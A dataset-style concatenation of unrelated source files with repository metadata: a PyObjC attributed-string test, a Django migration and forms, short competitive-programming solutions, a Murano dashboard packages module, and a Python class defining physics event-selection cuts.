self.assertIsInstance(AppKit.NSVerticalGlyphFormAttributeName, str)
self.assertIsInstance(AppKit.NSTextLayoutSectionOrientation, str)
self.assertIsInstance(AppKit.NSTextLayoutSectionRange, str)
self.assertIsInstance(AppKit.NSTextLayoutSectionsAttribute, str)
@min_os_level("10.8")
def testConstants10_8(self):
self.assertIsInstance(AppKit.NSTextAlternativesAttributeName, str)
self.assertIsInstance(AppKit.NSUsesScreenFontsDocumentAttribute, str)
@min_os_level("10.10")
def testConstants10_10(self):
self.assertIsInstance(AppKit.NSTextEffectAttributeName, str)
self.assertIsInstance(AppKit.NSTextEffectLetterpressStyle, str)
@min_os_level("12.0")
def test_constants12_0(self):
self.assertEqual(Foundation.NSInlinePresentationIntentEmphasized, 1 << 0)
self.assertEqual(
Foundation.NSInlinePresentationIntentStronglyEmphasized, 1 << 1
)
self.assertEqual(Foundation.NSInlinePresentationIntentCode, 1 << 2)
self.assertEqual(Foundation.NSInlinePresentationIntentStrikethrough, 1 << 5)
self.assertEqual(Foundation.NSInlinePresentationIntentSoftBreak, 1 << 6)
self.assertEqual(Foundation.NSInlinePresentationIntentLineBreak, 1 << 7)
self.assertEqual(Foundation.NSInlinePresentationIntentInlineHTML, 1 << 8)
self.assertEqual(Foundation.NSInlinePresentationIntentBlockHTML, 1 << 9)
self.assertIsInstance(Foundation.NSInlinePresentationIntentAttributeName, str)
self.assertIsInstance(Foundation.NSAlternateDescriptionAttributeName, str)
self.assertIsInstance(Foundation.NSImageURLAttributeName, str)
self.assertIsInstance(Foundation.NSLanguageIdentifierAttributeName, str)
self.assertEqual(
Foundation.NSAttributedStringMarkdownParsingFailureReturnError, 0
)
self.assertEqual(
Foundation.NSAttributedStringMarkdownParsingFailureReturnPartiallyParsedIfPossible,
1,
)
self.assertEqual(Foundation.NSAttributedStringMarkdownInterpretedSyntaxFull, 0)
self.assertEqual(
Foundation.NSAttributedStringMarkdownInterpretedSyntaxInlineOnly, 1
)
self.assertEqual(
Foundation.NSAttributedStringFormattingInsertArgumentAttributesWithoutMerging,
1 << 0,
)
self.assertEqual(
Foundation.NSAttributedStringFormattingApplyReplacementIndexAttribute,
1 << 1,
)
self.assertIsInstance(Foundation.NSReplacementIndexAttributeName, str)
self.assertIsInstance(Foundation.NSMorphologyAttributeName, str)
self.assertIsInstance(Foundation.NSInflectionRuleAttributeName, str)
self.assertIsInstance(Foundation.NSPresentationIntentAttributeName, str)
self.assertIsInstance(Foundation.NSInflectionAlternativeAttributeName, str)
self.assertEqual(Foundation.NSPresentationIntentKindParagraph, 0)
self.assertEqual(Foundation.NSPresentationIntentKindHeader, 1)
self.assertEqual(Foundation.NSPresentationIntentKindOrderedList, 2)
self.assertEqual(Foundation.NSPresentationIntentKindUnorderedList, 3)
self.assertEqual(Foundation.NSPresentationIntentKindListItem, 4)
self.assertEqual(Foundation.NSPresentationIntentKindCodeBlock, 5)
self.assertEqual(Foundation.NSPresentationIntentKindBlockQuote, 6)
self.assertEqual(Foundation.NSPresentationIntentKindThematicBreak, 7)
self.assertEqual(Foundation.NSPresentationIntentKindTable, 8)
self.assertEqual(Foundation.NSPresentationIntentKindTableHeaderRow, 9)
self.assertEqual(Foundation.NSPresentationIntentKindTableRow, 10)
self.assertEqual(Foundation.NSPresentationIntentKindTableCell, 11)
self.assertEqual(Foundation.NSPresentationIntentTableColumnAlignmentLeft, 0)
self.assertEqual(Foundation.NSPresentationIntentTableColumnAlignmentCenter, 1)
self.assertEqual(Foundation.NSPresentationIntentTableColumnAlignmentRight, 2)
@min_os_level("10.6")
def testMethods10_6(self):
self.assertArgHasType(
AppKit.NSAttributedString.enumerateAttributesInRange_options_usingBlock_,
0,
AppKit.NSRange.__typestr__,
)
self.assertArgIsBlock(
AppKit.NSAttributedString.enumerateAttributesInRange_options_usingBlock_,
2,
b"v@" + AppKit.NSRange.__typestr__ + b"o^" + objc._C_NSBOOL,
)
self.assertArgHasType(
AppKit.NSAttributedString.enumerateAttribute_inRange_options_usingBlock_,
1,
AppKit.NSRange.__typestr__,
)
self.assertArgIsBlock(
AppKit.NSAttributedString.enumerateAttribute_inRange_options_usingBlock_,
3,
b"v@" + AppKit.NSRange.__typestr__ + b"o^" + objc._C_NSBOOL,
)
@min_os_level("12.0")
def test_methods12_0(self):
self.assertResultIsBOOL(
Foundation.NSAttributedStringMarkdownParsingOptions.allowsExtendedAttributes
)
self.assertArgIsBOOL(
Foundation.NSAttributedStringMarkdownParsingOptions.setAllowsExtendedAttributes_,
0,
)
self.assertArgIsOut(
Foundation.NSAttributedString.initWithContentsOfMarkdownFileAtURL_options_baseURL_error_,
3,
)
self.assertArgIsOut(
Foundation.NSAttributedString.initWithMarkdown_options_baseURL_error_, 3
)
self.assertArgIsOut(
Foundation.NSAttributedString.initWithMarkdownString_options_baseURL_error_,
3,
)
self.assertArgIsPrintf(
Foundation.NSAttributedString.initWithFormat_options_locale_, 0
)
self.assertArgIsPrintf(
Foundation.NSAttributedString.localizedAttributedStringWithFormat_, 0
)
self.assertArgIsPrintf(
Foundation.NSAttributedString.localizedAttributedStringWithFormat_options_,
0,
)
self.assertArgIsPrintf(
Foundation.NSMutableAttributedString.appendLocalizedFormat_, 0
)
self.assertResultIsBOOL(
Foundation.NSPresentationIntent.isEquivalentToPresentationIntent_
)
| [
"[email protected]"
] | |
cdc62e0661ae30c80e83b7d35e680840195d3461 | 2929a5acbe52994cf2f961ed120374b7b330d074 | /form5/migrations/0008_auto_20200724_1433.py | 30b1610c3e20398521e7651d662281109a24371c | [] | no_license | orhunakar01/larasolar01 | a52135747676c587f6dfd98c67bf4c4a323dc448 | 18e12ecd5adc086da56b956a7f8da33f0723c84a | refs/heads/master | 2022-12-04T16:06:32.983099 | 2020-08-26T06:45:03 | 2020-08-26T06:45:03 | 290,418,075 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 434 | py | # Generated by Django 3.0.8 on 2020-07-24 11:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('form5', '0007_auto_20200724_1430'),
]
operations = [
migrations.AlterField(
model_name='form5',
name='dosya',
field=models.FileField(db_index=True, upload_to='', verbose_name='Fatura PDF Ekleyiniz.'),
),
]
| [
"[email protected]"
] | |
e8bd886a3bdc6cc1e1d74870cc517a83b8118279 | 51885da54b320351bfea42c7dd629f41985454cd | /abc198/e.py | 4bad4cd9760be8cf70992b7142d358622bb251b8 | [] | no_license | mskt4440/AtCoder | dd266247205faeda468f911bff279a792eef5113 | f22702e3932e129a13f0683e91e5cc1a0a99c8d5 | refs/heads/master | 2021-12-15T10:21:31.036601 | 2021-12-14T08:19:11 | 2021-12-14T08:19:11 | 185,161,276 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,109 | py | #
# abc198 e
#
import sys
from io import StringIO
import unittest
from collections import deque
class TestClass(unittest.TestCase):
    """Sample-input tests for ``resolve`` (AtCoder ABC198 E).

    NOTE(review): the triple-quoted ``input``/``output`` literals below keep
    the source indentation inside the strings, and the local name ``input``
    shadows the builtin inside each test — presumably tolerated because
    ``resolve`` splits on whitespace; confirm before relying on ``assertIO``.
    """
    # Run resolve() with *input* on stdin and compare captured stdout
    # (minus the trailing newline) against *output*.
    def assertIO(self, input, output):
        stdout, stdin = sys.stdout, sys.stdin
        sys.stdout, sys.stdin = StringIO(), StringIO(input)
        resolve()
        sys.stdout.seek(0)
        out = sys.stdout.read()[:-1]
        sys.stdout, sys.stdin = stdout, stdin
        self.assertEqual(out, output)
    # Sample 1 from the problem statement.
    def test_入力例_1(self):
        input = """6
        2 7 1 8 2 8
        1 2
        3 6
        3 2
        4 3
        2 5"""
        output = """1
        2
        3
        4
        6"""
        self.assertIO(input, output)
    # Sample 2 from the problem statement (a path graph).
    def test_入力例_2(self):
        input = """10
        3 1 4 1 5 9 2 6 5 3
        1 2
        2 3
        3 4
        4 5
        5 6
        6 7
        7 8
        8 9
        9 10"""
        output = """1
        2
        3
        5
        6
        7
        8"""
        self.assertIO(input, output)
def resolve():
    """Solve AtCoder ABC198 E ("Unique Color").

    Reads from stdin: N, the N vertex colours C, and N-1 tree edges
    (1-indexed).  Prints, one per line in increasing order, every "good"
    vertex — a vertex whose colour does not appear on any other vertex of
    the path from vertex 1 to it.  (The original function only parsed the
    input and returned nothing.)
    """
    N = int(input())
    C = list(map(int, input().split()))
    AB = [list(map(int, input().split())) for _ in range(N - 1)]
    G = [[] for _ in range(N)]
    for a, b in AB:
        G[a - 1].append(b - 1)
        G[b - 1].append(a - 1)
    # Iterative DFS from the root (vertex 0), tracking how often each colour
    # occurs on the current root-to-vertex path: a vertex is good exactly
    # when its colour count is zero on entry.
    seen = {}
    good = []
    stack = [(0, -1, False)]
    while stack:
        v, parent, leaving = stack.pop()
        color = C[v]
        if leaving:
            # Post-visit event: undo this vertex's colour contribution.
            seen[color] -= 1
            continue
        if seen.get(color, 0) == 0:
            good.append(v + 1)
        seen[color] = seen.get(color, 0) + 1
        stack.append((v, parent, True))
        for w in G[v]:
            if w != parent:
                stack.append((w, v, False))
    print('\n'.join(map(str, sorted(good))))
if __name__ == "__main__":
    # An ``if`` suite containing only comments is a SyntaxError, so the
    # script as committed could not even be imported; re-enable the solver.
    # unittest.main()
    resolve()
| [
"[email protected]"
] | |
eed9894019e05eca7b30267d37c17455147ae279 | 52a3beeb07ad326115084a47a9e698efbaec054b | /horizon/.venv/lib/python2.7/site-packages/muranodashboard_org/api/packages.py | 30555b0805e18d567b9299fc0c686cec216987c7 | [
"Apache-2.0"
] | permissive | bopopescu/sample_scripts | 3dade0710ecdc8f9251dc60164747830f8de6877 | f9edce63c0a4d636f672702153662bd77bfd400d | refs/heads/master | 2022-11-17T19:19:34.210886 | 2018-06-11T04:14:27 | 2018-06-11T04:14:27 | 282,088,840 | 0 | 0 | null | 2020-07-24T00:57:31 | 2020-07-24T00:57:31 | null | UTF-8 | Python | false | false | 3,859 | py | # Copyright (c) 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
from django.conf import settings
import yaml
from muranodashboard import api
from muranodashboard.common import cache
from muranodashboard.dynamic_ui import yaql_expression
def package_list(request, marker=None, filters=None, paginate=False,
                 page_size=20, sort_dir=None, limit=None):
    """Fetch Murano packages, returning ``(packages, has_more_data)``.

    When *paginate* is true, at most *page_size* packages are returned and
    ``has_more_data`` reports whether a further page exists; otherwise up to
    *limit* packages (default ``settings.PACKAGES_LIMIT`` or 100) are
    returned and ``has_more_data`` is always False.
    """
    limit = limit or getattr(settings, 'PACKAGES_LIMIT', 100)
    # Copy the filters so the caller's dict is not mutated by the
    # 'marker'/'sort_dir' keys added below (the original wrote into it).
    filters = dict(filters) if filters else {}
    if paginate:
        # Request one extra item so we can detect whether a next page exists.
        request_size = page_size + 1
    else:
        request_size = limit
    if marker:
        filters['marker'] = marker
    if sort_dir:
        filters['sort_dir'] = sort_dir
    client = api.muranoclient(request)
    packages_iter = client.packages.filter(limit=request_size,
                                           **filters)
    has_more_data = False
    if paginate:
        packages = list(itertools.islice(packages_iter, request_size))
        if len(packages) > page_size:
            # Drop the sentinel extra item before returning the page.
            packages.pop()
            has_more_data = True
    else:
        packages = list(packages_iter)
    return packages, has_more_data
def apps_that_inherit(request, fqn):
    """Return packages inheriting *fqn*, or ``[]`` when Glare is disabled.

    The inheritance filter is only meaningful with the Glare artifact
    repository (``MURANO_USE_GLARE``), hence the early exit.
    """
    if not getattr(settings, 'MURANO_USE_GLARE', False):
        return []
    return api.muranoclient(request).packages.filter(inherits=fqn)
def app_by_fqn(request, fqn, catalog=True):
    """Return the first package matching *fqn*, or ``None`` if none exists."""
    apps = api.muranoclient(request).packages.filter(fqn=fqn, catalog=catalog)
    # ``next(it, default)`` replaces the Python-2-only ``apps.next()`` /
    # StopIteration dance with the portable, equivalent built-in.
    return next(iter(apps), None)
def make_loader_cls():
    """Build a YAML Loader subclass that parses ``!yaql`` scalars into
    :class:`yaql_expression.YaqlExpression` objects (both via explicit tags
    and via implicit resolution)."""
    class Loader(yaml.Loader):
        pass

    def yaql_constructor(loader, node):
        return yaql_expression.YaqlExpression(loader.construct_scalar(node))

    # workaround for PyYAML bug: http://pyyaml.org/ticket/221 — give the
    # subclass its own copy of the resolver table so registering the
    # implicit resolver below cannot mutate yaml.Loader's shared lists.
    Loader.yaml_implicit_resolvers = {
        key: values[:]
        for key, values in yaml.Loader.yaml_implicit_resolvers.items()
    }
    Loader.add_constructor(u'!yaql', yaql_constructor)
    Loader.add_implicit_resolver(
        u'!yaql', yaql_expression.YaqlExpression, None)
    return Loader
# Here are cached some data calls to api; note that not every package attribute
# getter should be cached - only immutable ones could be safely cached. E.g.,
# it would be a mistake to cache Application Name because it is mutable and can
# be changed in Manage -> Packages while cache is immutable (i.e. it
# its contents are obtained from the api only the first time).
@cache.with_cache('ui', 'ui.yaml')
def get_app_ui(request, app_id):
    """Return the package's dynamic UI definition, parsed with the
    !yaql-aware loader.  Cached on disk as ``ui.yaml`` per package."""
    return api.muranoclient(request).packages.get_ui(app_id, make_loader_cls())
@cache.with_cache('logo', 'logo.png')
def get_app_logo(request, app_id):
    """Return the package's logo image bytes (cached as ``logo.png``)."""
    return api.muranoclient(request).packages.get_logo(app_id)
@cache.with_cache('supplier_logo', 'supplier_logo.png')
def get_app_supplier_logo(request, app_id):
    """Return the supplier's logo image bytes (cached per package)."""
    return api.muranoclient(request).packages.get_supplier_logo(app_id)
@cache.with_cache('package_fqn')
def get_app_fqn(request, app_id):
    """Return the package's fully qualified name (immutable, safe to cache)."""
    package = api.muranoclient(request).packages.get(app_id)
    return package.fully_qualified_name
@cache.with_cache('package_name')
def get_service_name(request, app_id):
    """Return the package's display name.

    NOTE(review): the module comment above warns against caching mutable
    attributes such as the Application Name, yet this caches exactly that —
    a renamed package will keep showing its stale name here; confirm this
    is intended.
    """
    package = api.muranoclient(request).packages.get(app_id)
    return package.name
| [
"[email protected]"
] | |
0f702ff15d1d5b9145082f6402c50e7a282d49a8 | 5b3d8b5c612c802fd846de63f86b57652d33f672 | /Python/eight_kyu/make_negative.py | 1ced2d2e37e6381d69e9df3fff51514a55f71b75 | [
"Apache-2.0"
] | permissive | Brokenshire/codewars-projects | 1e591b57ed910a567f6c0423beb194fa7f8f693e | db9cd09618b8a7085b0d53ad76f73f9e249b9396 | refs/heads/master | 2021-07-22T18:50:25.847592 | 2021-01-25T23:27:17 | 2021-01-25T23:27:17 | 228,114,677 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 724 | py | # Python solution for 'Return Negative' codewars question.
# Level: 8 kyu
# Tags: FUNDAMENTALS and NUMBERS.
# Author: Jack Brokenshire
# Date: 11/04/2020
import unittest
def make_negative(number):
    """Force *number* to be non-positive.

    Positive values are negated; zero and already-negative values are
    returned unchanged.
    """
    return -number if number > 0 else number
class TestMakeNegative(unittest.TestCase):
    """Unit tests for the ``make_negative`` function."""
    def test_make_negative(self):
        # Covers positive, already-negative, and zero inputs.
        self.assertEqual(make_negative(42), -42)
        self.assertEqual(make_negative(1), -1)
        self.assertEqual(make_negative(-5), -5)
        self.assertEqual(make_negative(0), 0)
if __name__ == '__main__':
    # Run the unittest suite when executed directly.
    unittest.main()
| [
"[email protected]"
] | |
be5c1b5992e68428d06e14747e5ee74245b52472 | 58afefdde86346760bea40690b1675c6639c8b84 | /leetcode/elimination-game/365996335.py | a8932065ba6959fe4df1131bf0761ece4fd6de2d | [] | no_license | ausaki/data_structures_and_algorithms | aaa563f713cbab3c34a9465039d52b853f95548e | 4f5f5124534bd4423356a5f5572b8a39b7828d80 | refs/heads/master | 2021-06-21T10:44:44.549601 | 2021-04-06T11:30:21 | 2021-04-06T11:30:21 | 201,942,771 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 311 | py | # title: elimination-game
# detail: https://leetcode.com/submissions/detail/365996335/
# datetime: Mon Jul 13 18:50:53 2020
# runtime: 52 ms
# memory: 13.7 MB
class Solution:
    def lastRemaining(self, n: int) -> int:
        """Survivor of the alternating left/right elimination game on 1..n
        (LeetCode 390), computed iteratively instead of recursively.

        Track the first surviving number (``head``) and the gap between
        survivors (``step``); the head advances on every left-to-right
        sweep, and on right-to-left sweeps only when an odd number of
        values remain.
        """
        head, step, remaining = 1, 1, n
        left_to_right = True
        while remaining > 1:
            if left_to_right or remaining % 2 == 1:
                head += step
            remaining //= 2
            step *= 2
            left_to_right = not left_to_right
        return head
| [
"[email protected]"
] | |
1dc16a63a83e65662628b2453ff91ff337eff28d | 3de21fc587c02f2702bd5770f11a31d5558a4666 | /django_ac22/apps/avisos/forms.py | f0f90b51cfdad481b5d8887b01638b45daf0f108 | [] | no_license | juanros13/ac22 | 8c20d59de62d596a73d6d7190f551ef3accf2b8e | d8ecf0686f3d8a57a747503b231b46277db71a6e | refs/heads/master | 2020-04-16T11:24:07.344404 | 2016-09-22T23:51:39 | 2016-09-22T23:51:39 | 65,859,654 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,110 | py | # -*- encoding: utf-8 -*-
from django import forms
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.contrib.auth.forms import UserCreationForm, AuthenticationForm
from django.contrib.auth import authenticate
from django.forms.widgets import Select, Textarea
from apps.avisos.models import Aviso, ComentarioAviso
class AvisoAddForm(forms.ModelForm):
    """ModelForm for creating an ``Aviso`` (notice).

    User-facing labels and placeholders are intentionally in Spanish;
    widgets are styled with the Bootstrap ``form-control`` class.
    """
    # Title field rendered as a styled text input with a Spanish placeholder.
    titulo = forms.CharField(
        widget=forms.TextInput(
            attrs={
                'class': 'form-control',
                'placeholder' : 'Ingresa el titulo del aviso',
            }
        ),
        label = "Titulo del aviso",
    )
    class Meta:
        model = Aviso
        fields = ('tipo','titulo', 'contenido','mantener_al_principio')
        widgets = {
            'contenido': Textarea(
                attrs={
                    'class': 'form-control',
                }
            ),
        }
class ComentarioAddForm(forms.ModelForm):
    """ModelForm for adding a ``ComentarioAviso`` (comment on a notice)."""
    class Meta:
        model = ComentarioAviso
        fields = ('comentario',)
        widgets = {
            'comentario': Textarea(
                attrs={
                    'class': 'form-control',
                }
            ),
        }
| [
"[email protected]"
] | |
9d970a6420fe907b2979185d2b48aa7ae78262f1 | 5c61990fc1a79f389111a3e449c1fadf65fc1b8c | /portnet_reports/indicateurs_financier/__init__.py | b8f88826d9a9cd5ecc4a5bc263880c787dbaefa2 | [] | no_license | brahim94/portnet | 3befb64009fd014b74e01151cc429a613d3d2f11 | f1120ce4806ba2fd7e26132ca918d1ce8b9ad32c | refs/heads/master | 2023-04-14T07:17:40.956207 | 2021-04-27T16:37:48 | 2021-04-27T16:37:48 | 356,211,308 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27 | py | import financial_indicator
| [
"[email protected]"
] | |
81b9658d7beef3f5af94d215949d0df32e66dc26 | df8ec66b10e97956f80ec52503dd456372c03c4a | /plotter/objects/selections.py | b4d32bd707d2c9a8132f64b9d47eda95be2cf1ba | [] | no_license | amlyon/plotter | 3670820faf9864501b666f2e157e435a8285a766 | 5a3295fbf5d0875fd4a1c53164ac45e92d3ccd05 | refs/heads/master | 2022-11-17T02:27:42.072710 | 2020-07-07T20:19:25 | 2020-07-07T20:19:25 | 270,580,472 | 0 | 0 | null | 2020-06-23T14:55:25 | 2020-06-08T07:56:20 | Python | UTF-8 | Python | false | false | 10,048 | py | from collections import OrderedDict
class Selections(object):
    """Builds the named event-selection strings for one HNL analysis channel.

    Each entry of ``self.selections`` is a ROOT/TTree-style cut string;
    ``self.selections_pd`` holds the same cuts rewritten for
    ``pandas.DataFrame.query``.  The exact whitespace inside the strings is
    cosmetic alignment only.
    """
    def __init__(self, channel):
        # channel is one of 'mmm', 'mem', 'eem', 'eee' (lepton flavours of
        # the prompt lepton + displaced pair).
        self.channel = channel
        self.base = None
        self.selections = OrderedDict()
        # Channel-specific trigger-lepton pt thresholds and lepton IDs.
        if self.channel == 'mmm':
            self.selections['pt_iso'] = ' & '.join(['l0_pt > 25' ,
                                                    'l2_pt > 5' ,
                                                    'l1_pt > 5' ,
                                                    'l0_id_m == 1' ,
                                                    'l1_id_hnl_m == 1',
                                                    'l2_id_hnl_m == 1',])
        if self.channel == 'mem':
            self.selections['pt_iso'] = ' & '.join(['l0_pt > 25' ,
                                                    'l2_pt > 5' ,
                                                    'l1_pt > 5' ,
                                                    'l0_id_m == 1' ,
                                                    'l1_id_hnl_l_niso == 1' ,
                                                    'l2_id_hnl_m == 1' ,])
        if self.channel == 'eem':
            self.selections['pt_iso'] = ' & '.join(['l0_pt > 32' ,
                                                    'l2_pt > 5' ,
                                                    'l1_pt > 5' ,
                                                    'l0_id_mva_niso_90 == 1',
                                                    'l1_id_hnl_l_niso == 1' ,
                                                    'l2_id_hnl_m == 1' ,])
        if self.channel == 'eee':
            self.selections['pt_iso'] = ' & '.join(['l0_pt > 32' ,
                                                    'l2_pt > 5' ,
                                                    'l1_pt > 5' ,
                                                    'l0_id_mva_niso_90 == 1',
                                                    'l1_id_hnl_l_niso == 1' ,
                                                    'l2_id_hnl_l_niso == 1' ,])
        assert self.selections['pt_iso'], 'Error: No channel specific selection applied!'
        # Common preselection: prompt-lepton quality, displaced-pair
        # kinematics and MET filters.
        self.selections['pre_baseline'] = ' & '.join([
            'abs(l0_eta) < 2.4' ,
            'abs(l0_dxy) < 0.05' ,
            'abs(l0_dz) < 0.1' ,
            'l0_reliso_rho_03 < 0.1',
            'abs(l1_eta) < 2.4' ,
            'l1_reliso_rho_03 < 10' ,
            'abs(l2_eta) < 2.4' ,
            'l2_reliso_rho_03 < 10' ,
            'hnl_q_12 == 0' ,
            'hnl_dr_12 < 1.' ,
            'hnl_dr_12 > 0.02' ,
            'hnl_m_12 < 20' ,
            'abs(hnl_dphi_01)>1.' ,
            'abs(hnl_dphi_02)>1.' , # dphi a la facon belgique
            'pass_met_filters==1' ,
        ])
        # Baseline: preselection plus b-jet veto, displacement significance
        # and secondary-vertex quality requirements.
        self.selections['baseline'] = ' & '.join([
            self.selections['pre_baseline'],
            'nbj == 0' ,
            'hnl_2d_disp_sig>20' ,
            'hnl_pt_12>15' ,
            'sv_cos>0.99' ,
            'sv_prob>0.001' ,
            'abs(l1_dz)<10' ,
            'abs(l2_dz)<10' ,
            'abs(l1_dxy) > 0.01' ,
            'abs(l2_dxy) > 0.01' ,
        ])
        # Visible-W-mass window split into sideband and signal region.
        self.selections['sideband'] = '!(hnl_w_vis_m > 50. & hnl_w_vis_m < 80.)' # THIS IS IMPORTANT!
        self.selections['signal_region'] = '(hnl_w_vis_m > 50. & hnl_w_vis_m < 80.)' # THIS IS IMPORTANT!
        # FSR veto
        # remove events where the tree lepton make the Z mass
        # and at least two same flavour OS leptons are present
        self.selections['fsr_veto'] = '( (abs(hnl_w_vis_m-91.19)>10. & (l0_pdgid==-l1_pdgid | l0_pdgid==-l2_pdgid)) | !(l0_pdgid==-l1_pdgid | l0_pdgid==-l2_pdgid))'
        # self.selections['vetoes_12_OS'] = ' & '.join([
        #     # vetoes 12 (always OS anyways)
        #     'abs(hnl_m_12-3.0969) > 0.08' , # jpsi veto
        #     'abs(hnl_m_12-3.6861) > 0.08' , # psi (2S) veto
        #     'abs(hnl_m_12-0.7827) > 0.08' , # omega veto
        #     'abs(hnl_m_12-1.0190) > 0.08' , # phi veto
        # ])
        # after discussing with Martina 9/1/2020
        # Resonance vetoes on the displaced dilepton pair, applied only at
        # low displacement where prompt resonances contaminate.
        self.selections['vetoes_12_OS'] = ' & '.join([
            # vetoes 12 (always OS anyways)
            '!(hnl_2d_disp<1.5 & abs(hnl_m_12-3.0969) < 0.08)', # jpsi veto
            '!(hnl_2d_disp<1.5 & abs(hnl_m_12-3.6861) < 0.08)', # psi (2S) veto
            '!(hnl_2d_disp<1.5 & abs(hnl_m_12-0.7827) < 0.08)', # omega veto
            '!(hnl_2d_disp<1.5 & abs(hnl_m_12-1.0190) < 0.08)', # phi veto
        ])
        # Resonance vetoes on the (prompt, displaced-1) pair, only when OS.
        self.selections['vetoes_01_OS'] = ' & '.join([
            # vetoes 01 (only is OS)
            '!(hnl_q_01==0 & abs(hnl_m_01-91.1876) < 10)' , # Z veto
            '!(hnl_q_01==0 & abs(hnl_m_01- 9.4603) < 0.08)', # Upsilon veto
            '!(hnl_q_01==0 & abs(hnl_m_01-10.0233) < 0.08)', # Upsilon (2S) veto
            '!(hnl_q_01==0 & abs(hnl_m_01-10.3552) < 0.08)', # Upsilon (3S) veto
            '!(hnl_q_01==0 & abs(hnl_m_01-3.0969) < 0.08)', # jpsi veto
            '!(hnl_q_01==0 & abs(hnl_m_01-3.6861) < 0.08)', # psi (2S) veto
            '!(hnl_q_01==0 & abs(hnl_m_01-0.7827) < 0.08)', # omega veto
            '!(hnl_q_01==0 & abs(hnl_m_01-1.0190) < 0.08)', # phi veto
        ])
        # Resonance vetoes on the (prompt, displaced-2) pair, only when OS.
        self.selections['vetoes_02_OS'] = ' & '.join([
            # vetoes 02 (only is OS)
            '!(hnl_q_02==0 & abs(hnl_m_02-91.1876) < 10)' , # Z veto
            '!(hnl_q_02==0 & abs(hnl_m_02- 9.4603) < 0.08)', # Upsilon veto
            '!(hnl_q_02==0 & abs(hnl_m_02-10.0233) < 0.08)', # Upsilon (2S) veto
            '!(hnl_q_02==0 & abs(hnl_m_02-10.3552) < 0.08)', # Upsilon (3S) veto
            '!(hnl_q_02==0 & abs(hnl_m_02-3.0969) < 0.08)', # jpsi veto
            '!(hnl_q_02==0 & abs(hnl_m_02-3.6861) < 0.08)', # psi (2S) veto
            '!(hnl_q_02==0 & abs(hnl_m_02-0.7827) < 0.08)', # omega veto
            '!(hnl_q_02==0 & abs(hnl_m_02-1.0190) < 0.08)', # phi veto
        ])
        # Tight isolation requirement on both displaced leptons.
        self.selections['tight'] = ' & '.join([
            'l1_reliso_rho_03 < 0.2',
            'l2_reliso_rho_03 < 0.2',
        ])
        # RM is this wrong? this allows for one of the two displaced leptons to be
        # neither prompt nor conversion
        # self.selections['is_prompt_lepton'] = '(%s)' %(' | '.join([
        #     'l1_gen_match_isPrompt==1',
        #     'l1_gen_match_pdgid==22',
        #     'l2_gen_match_isPrompt==1',
        #     'l2_gen_match_pdgid==22',
        # ]))
        # Both displaced leptons must be gen-matched prompt or photon
        # (conversion) — the AND of the two per-lepton conditions.
        self.selections['is_prompt_lepton'] = ' & '.join([
            '(l1_gen_match_isPrompt==1 | l1_gen_match_pdgid==22)',
            '(l2_gen_match_isPrompt==1 | l2_gen_match_pdgid==22)',
        ])
        # Z->mumu tag-and-probe style control region.
        self.selections['zmm'] = ' & '.join([
            'l0_pt > 40' ,
            'abs(l0_eta) < 2.4' ,
            'abs(l0_dxy) < 0.05' ,
            'abs(l0_dz) < 0.2' ,
            'l0_reliso_rho_03 < 0.2',
            'l0_id_t == 1' ,
            'l1_pt > 35' ,
            'abs(l1_eta) < 2.4' ,
            'abs(l1_dxy) < 0.05' ,
            'abs(l1_dz) < 0.2' ,
            'l1_reliso_rho_03 < 0.2',
            'l1_id_t == 1' ,
            'hnl_q_01==0' ,
            'abs(hnl_dphi_01)>1.' ,
            'pass_met_filters==1' ,
        ])
        # Z->ee control region.
        self.selections['zee'] = ' & '.join([
            'l0_pt > 40' ,
            'abs(l0_eta) < 2.4' ,
            'abs(l0_dxy) < 0.05' ,
            'abs(l0_dz) < 0.2' ,
            'l0_reliso_rho_03 < 0.2',
            'l0_id_mva_niso_90 == 1' ,
            'l1_pt > 35' ,
            'abs(l1_eta) < 2.4' ,
            'abs(l1_dxy) < 0.05' ,
            'abs(l1_dz) < 0.2' ,
            'l1_reliso_rho_03 < 0.2',
            'l1_id_mva_niso_90 == 1',
            'hnl_q_01==0' ,
            'abs(hnl_dphi_01)>1.' ,
            'pass_met_filters==1' ,
        ])
        # ttbar e-mu control regions (>=1 b-jet), with the muon as l0 and
        # the electron as l1 ...
        self.selections['ttbar_me*'] = ' & '.join([
            'l0_pt > 28' ,
            'abs(l0_eta) < 2.4' ,
            'abs(l0_dxy) < 0.05' ,
            'abs(l0_dz) < 0.2' ,
            'l0_reliso_rho_03 < 0.2',
            'l0_id_m == 1' ,
            'l1_pt > 10' ,
            'abs(l1_eta) < 2.4' ,
            'abs(l1_dxy) < 0.05' ,
            'abs(l1_dz) < 0.2' ,
            'l1_reliso_rho_03 < 0.2',
            'l1_id_mva_iso_90 == 1' ,
            'hnl_q_01==0' ,
            'nbj>=1' ,
            'abs(hnl_dphi_01)>1.' ,
            'pass_met_filters==1' ,
        ])
        # ... and vice versa (electron as l0, muon as l2).
        self.selections['ttbar_em*'] = ' & '.join([
            'l0_pt > 28' ,
            'abs(l0_eta) < 2.4' ,
            'abs(l0_dxy) < 0.05' ,
            'abs(l0_dz) < 0.2' ,
            'l0_reliso_rho_03 < 0.2',
            'l0_id_mva_iso_90 == 1' ,
            'l2_pt > 10' ,
            'abs(l2_eta) < 2.4' ,
            'abs(l2_dxy) < 0.05' ,
            'abs(l2_dz) < 0.2' ,
            'l2_reliso_rho_03 < 0.2',
            'l2_id_m == 1' ,
            'hnl_q_02==0' ,
            'nbj>=1' ,
            'abs(hnl_dphi_02)>1.' ,
            'pass_met_filters==1' ,
        ])
        # convert to pandas readable queries
        # NOTE(review): the '!=' -> 'not' replacement would corrupt any cut
        # containing '!=' (pandas.query understands '!=' natively); none of
